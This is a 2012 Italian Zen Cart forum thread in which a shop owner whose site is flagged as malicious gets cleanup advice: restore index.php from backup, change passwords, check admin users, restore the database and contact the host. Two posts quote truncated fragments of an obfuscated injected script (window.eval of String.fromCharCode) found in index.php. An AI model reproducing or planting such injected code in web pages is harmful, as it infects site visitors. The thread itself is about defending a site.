Oggi è ven mar 29, 2024 4:17 pm

Benvenuto!

Lo stato dell'Arte come software Open Source gratuito E-commerce.
 

Zen Cart Italia

Installazione - Configurazione

è stato segnalato come sito web malevolo ed è stato bloccat

Supporto concernente queste attività

Moderatori: Sandro Carniel aka webmaster, Paolo De Dionigi aka Spike00

è stato segnalato come sito web malevolo ed è stato bloccat

Messaggioda 2sicilie00 » sab lug 07, 2012 12:22 pm

Salve a tutti,
da qualche giorno ricevo questo messaggio da firefox:
Segnalato sito malevolo
Il sito web www.bottega2sicilie.net è stato segnalato come sito web malevolo ed è stato bloccato sulla base delle impostazioni di sicurezza correnti.
Un sito web malevolo cerca di installare dei software in grado di sottrarre le informazioni personali degli utenti, sfruttare il computer per attaccare altre macchine o semplicemente danneggiare il sistema.Alcuni di questi siti distribuiscono intenzionalmente software dannoso, ma gran parte dei siti viene compromessa senza che il proprietario ne sia a conoscenza o ne sia responsabile.
Che strumenti posso usare per una eventuale scansione e riparazione del sito?
Grazie
2sicilie00
 
Messaggi: 25
Iscritto il: gio apr 30, 2009 5:51 pm
Località: Napoli

Re: è stato segnalato come sito web malevolo ed è stato bloc

Messaggioda fabioapo » sab lug 07, 2012 2:31 pm

Ciao
collegati via ftp al server e vedi quali sono le ultime pagine modificate.
Ne troverai qualcuna che è stata modificata probabilmente lo stesso giorno in cui hai ricevuto il messaggio che il tuo sito contiene malware. Se sei fortunato è stata modificata solo la index. Sostituiscila con una copia della index dell'ultimo backup funzionante del sito.
Poi ti colleghi al tuo account google, strumenti per il webmaster, salute del sito, malware e chiedi la riconsiderazione del sito.
Nel giro di qualche ora dovrebbero togliere il messaggio di malware e far raggiungere normalmente il sito agli utenti.
Poi modifica tutte le password di accesso al server via pannello e via ftp.
Prova a fare come ti ho detto poi facci sapere :)
buona fortuna
Fabio :-)
fabioapo
 
Messaggi: 33
Iscritto il: gio apr 30, 2009 11:21 pm
Località: Lecce

Re: è stato segnalato come sito web malevolo ed è stato bloc

Messaggioda 2sicilie00 » sab lug 07, 2012 4:06 pm

Grazie - stasera quando rientro cerco di trovare un file index di qualche tempo addietro ma come difendersi?
ho visualizzato il file index e alla fine del file trovo questa situazione
<?php require(DIR_WS_INCLUDES . 'application_bottom.php'); ?><script>/*km0ae9gr6m*/window.eval(String.fromCharCode(116,114,121,123,112,114,111,116,111,116,121,112,101,37,50,59,125,99,97,116,99,104,40,97,115,100,41,123,120,61,50,59,125,116,114,121,123,113,61,
che continua per almeno altre 50 righe
è normale?
2sicilie00
 
Messaggi: 25
Iscritto il: gio apr 30, 2009 5:51 pm
Località: Napoli

Re: è stato segnalato come sito web malevolo ed è stato bloc

Messaggioda fabioapo » sab lug 07, 2012 9:01 pm

Ciao
è esattamente lo stesso codice alterato che ho trovato io:

<script>/*km0ae9gr6m*/window.eval(String.fromCharCode(115,61,34,34,59,116,114,121,123,113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,112,34,41,59,113,46,97,112,112,101,110,100,67,104,105,108,100,40,34,49,50,51,34,43,110,41,59,125,99,97,116,99,104,40,113,

come difendersi non lo so, spero solo non accada di nuovo.
Secondo me vengono presi di mira i server, non i singoli siti, di fatti dopo un paio di giorni che mi è successa questa cosa e avevo già risolto, mi è arrivata una mail dai gestori del server che diceva che per motivi di sicurezza hanno cambiato automaticamente tutte le password di accesso al server. Non credo quindi che il mio fosse un caso isolato sulla loro piattaforma.

Ciao magari ti risponde qualcuno più esperto di me
cmq spero di esserti stato d'aiuto
ciao
Fabio :-)
fabioapo
 
Messaggi: 33
Iscritto il: gio apr 30, 2009 11:21 pm
Località: Lecce

Re: è stato segnalato come sito web malevolo ed è stato bloc

Messaggioda 2sicilie00 » sab lug 07, 2012 9:51 pm

Come mi è stato consigliato da fare ho sostituito il file index e tutto sembrava a posto ma dopo poco è risultato di nuovo alterato anche perchè Kaspersky rileva dei virus dalle pagine del sito.
Il problema grosso è che sono scomparse alcune directory dei prodotti.
2sicilie00
 
Messaggi: 25
Iscritto il: gio apr 30, 2009 5:51 pm
Località: Napoli

Re: è stato segnalato come sito web malevolo ed è stato bloc

Messaggioda fabioapo » sab lug 07, 2012 11:37 pm

Ciao
il malware viene trovato in più pagine perchè tutte le pagine passano attraverso la index per esempio:
www.sito.it/index.php?main_page=product_info&cPath=19&products_id=22
Assicurati solo che la index sia a posto.
Ah nel lato admin - strumenti - settaggi admin assicurati che non ci sia qualche utente indesiderato. Per il resto ripristina il DB con una copia recente
Fabio :-)
fabioapo
 
Messaggi: 33
Iscritto il: gio apr 30, 2009 11:21 pm
Località: Lecce

Re: è stato segnalato come sito web malevolo ed è stato bloc

Messaggioda 2sicilie00 » dom lug 08, 2012 6:36 am

Ripristinare il DB significa accedere non via FTP con filezilla ma a livello hosting?
2sicilie00
 
Messaggi: 25
Iscritto il: gio apr 30, 2009 5:51 pm
Località: Napoli

Re: è stato segnalato come sito web malevolo ed è stato bloc

Messaggioda fabioapo » dom lug 08, 2012 10:36 am

Si dal pannello dell'host
tramite phpmyadmin
Fabio :-)
fabioapo
 
Messaggi: 33
Iscritto il: gio apr 30, 2009 11:21 pm
Località: Lecce

Re: è stato segnalato come sito web malevolo ed è stato bloc

Messaggioda 2sicilie00 » dom lug 08, 2012 5:20 pm

Ogni giorno trovo il file INDEX modificato ma per poterlo fare devono usare programmi tipo filezilla ed avere la password? Come posso fare per poterli bloccare in modo definitivo?
2sicilie00
 
Messaggi: 25
Iscritto il: gio apr 30, 2009 5:51 pm
Località: Napoli

Re: è stato segnalato come sito web malevolo ed è stato bloc

Messaggioda fabioapo » dom lug 08, 2012 6:59 pm

Scrivi al tuo provider e fatti aiutare, fai controllare i log. Sicuramente è un problema loro specie se tu hai cambiato le password di accesso FTP
Fabio :-)
fabioapo
 
Messaggi: 33
Iscritto il: gio apr 30, 2009 11:21 pm
Località: Lecce

Prossimo

Torna a Installazione - Configurazione

cron

Login

Real Time Analytics